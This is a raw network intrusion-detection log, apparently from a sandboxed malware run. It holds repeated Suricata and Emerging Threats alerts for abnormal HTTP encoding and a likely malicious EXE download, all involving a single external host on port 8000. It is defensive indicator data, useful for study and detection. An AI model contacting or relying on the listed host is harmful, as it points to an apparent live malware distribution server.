TCP 143.92.58.180:8000 -> 192.168.56.103:49415 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49291 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49419 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49433 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49459 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49382 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49463 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49245 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49384 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49465 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49251 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49397 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49483 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49252 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49401 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49485 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49253 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49404 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49515 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49259 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49416 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49517 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49262 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49523 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49272 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49525 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49452 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49526 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49297 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49299 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49458 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49311 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49466 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49313 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49318 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49323 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49468 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49333 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49427 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49536 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49553 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49428 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49572 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49335 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49344 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49435 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49345 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49346 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49431 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49446 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49574 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49449 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49432 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49475 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49438 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49478 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49363 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49482 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49366 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49585 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49592 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49484 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49595 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49444 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49602 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49283 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49492 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49368 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49286 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49387 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49295 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49604 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49493 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49494 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49495 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49507 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49509 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49456 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49607 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49512 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49614 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49619 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49514 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49624 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49535 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49629 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49540 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49630 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49545 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49631 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49551 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49683 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49555 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49689 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49562 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49692 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49563 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49693 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49566 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49696 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49703 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49568 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49710 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49581 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49732 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49583 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49736 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49603 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49392 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49470 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49471 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49609 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49400 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49610 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49405 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49487 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49497 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49409 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49618 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49500 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49410 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49625 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49505 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49425 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49506 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49461 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49518 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49638 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49738 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49462 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49519 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49741 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49640 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49464 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49426 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49441 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49476 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49753 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49641 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49479 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49754 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49480 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49443 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49486 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49760 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49761 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49489 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49645 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49768 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49652 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49496 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49776 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49504 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49666 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49781 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49511 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49671 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49788 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49678 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49445 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49513 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49680 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49682 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49520 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49448 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49684 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49527 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49451 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49686 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49529 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49454 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49469 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49687 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49533 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49797 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49544 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49547 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49557 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49472 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49560 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49569 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49474 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49571 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49477 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49488 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49580 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49587 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49501 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49589 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49524 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49530 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49599 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49532 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49601 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49534 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49605 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49801 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49608 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49612 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49541 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49815 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49615 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49301 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49688 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49548 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49303 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49713 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49304 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49549 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49617 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49720 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49305 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
